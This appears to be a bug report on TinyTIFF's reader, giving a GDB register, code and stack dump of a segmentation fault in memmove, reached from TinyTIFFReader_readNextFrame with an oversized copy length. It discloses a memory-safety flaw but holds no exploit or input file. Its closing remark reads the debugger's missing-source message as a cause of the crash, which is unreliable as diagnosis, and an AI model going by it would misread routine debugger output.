Starting program: /home/ubuntu/Documents/TinyTIFF/src/tinytiffreader id8

Program received signal SIGSEGV, Segmentation fault.
\[----------------------------------registers-----------------------------------\]
RAX: 0x7ffdfdd09010 --\> 0x0 
RBX: 0x55555555b2a0 --\> 0x55555555b720 --\> 0xfbad2488 
RCX: 0x0 
RDX: 0x1fa0b8878 
RSI: 0x0 
RDI: 0x7ffdfdd09010 --\> 0x0 
RBP: 0x7fffffffdcd0 --\> 0x7fffffffdda0 --\> 0x7fffffffdef0 --\> 0x7fffffffdf30 --\> 0x0 
RSP: 0x7fffffffdca8 --\> 0x555555555663 (<TinyTIFFReader\_memcpy\_s+51>:	mov    eax,0x0)
RIP: 0x7ffff7f4d8f5 (<\_\_memmove\_avx\_unaligned\_erms+533>:	vmovdqu ymm4,YMMWORD PTR \[rsi\])
R8 : 0x7ffdfdd09010 --\> 0x0 
R9 : 0x0 
R10: 0x22 ('"')
R11: 0x246 
R12: 0x555555555240 (<\_start\>:	endbr64)
R13: 0x7fffffffe020 --\> 0x2 
R14: 0x0 
R15: 0x0
EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
\[-------------------------------------code-------------------------------------\]
   0x7ffff7f4d8ec <\_\_memmove\_avx\_unaligned\_erms+524>:	vmovdqu YMMWORD PTR \[r11\],ymm4
   0x7ffff7f4d8f1 <\_\_memmove\_avx\_unaligned\_erms+529>:	vzeroupper 
   0x7ffff7f4d8f4 <\_\_memmove\_avx\_unaligned\_erms+532>:	ret    
=\> 0x7ffff7f4d8f5 <\_\_memmove\_avx\_unaligned\_erms+533>:	vmovdqu ymm4,YMMWORD PTR \[rsi\]
   0x7ffff7f4d8f9 <\_\_memmove\_avx\_unaligned\_erms+537>:	vmovdqu ymm5,YMMWORD PTR \[rsi+0x20\]
   0x7ffff7f4d8fe <\_\_memmove\_avx\_unaligned\_erms+542>:	vmovdqu ymm6,YMMWORD PTR \[rsi+0x40\]
   0x7ffff7f4d903 <\_\_memmove\_avx\_unaligned\_erms+547>:	vmovdqu ymm7,YMMWORD PTR \[rsi+0x60\]
   0x7ffff7f4d908 <\_\_memmove\_avx\_unaligned\_erms+552>:	vmovdqu ymm8,YMMWORD PTR \[rsi+rdx\*1-0x20\]
\[------------------------------------stack-------------------------------------\]
0000| 0x7fffffffdca8 --\> 0x555555555663 (<TinyTIFFReader\_memcpy\_s+51>:	mov    eax,0x0)
0008| 0x7fffffffdcb0 --\> 0x1fa0b8878 
0016| 0x7fffffffdcb8 --\> 0x0 
0024| 0x7fffffffdcc0 --\> 0x1fa0b8878 
0032| 0x7fffffffdcc8 --\> 0x7ffdfdd09010 --\> 0x0 
0040| 0x7fffffffdcd0 --\> 0x7fffffffdda0 --\> 0x7fffffffdef0 --\> 0x7fffffffdf30 --\> 0x0 
0048| 0x7fffffffdcd8 --\> 0x5555555563fb (<TinyTIFFReader\_readNextFrame+886>:	jmp    0x555555556683 <TinyTIFFReader\_readNextFrame+1534>)
0056| 0x7fffffffdce0 --\> 0x0 
\[------------------------------------------------------------------------------\]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
\_\_memmove\_avx\_unaligned\_erms () at ../sysdeps/x86\_64/multiarch/memmove-vec-unaligned-erms.S:436
436	../sysdeps/x86\_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory.

you can see "../sysdeps/x86\_64/multiarch/memmove-vec-unaligned-erms.S: No such file or directory.", I think this problem is caused by abnormal references to Pointers, See this link.This one bug I tested on multiple systems crashed.

Tag

#ubuntu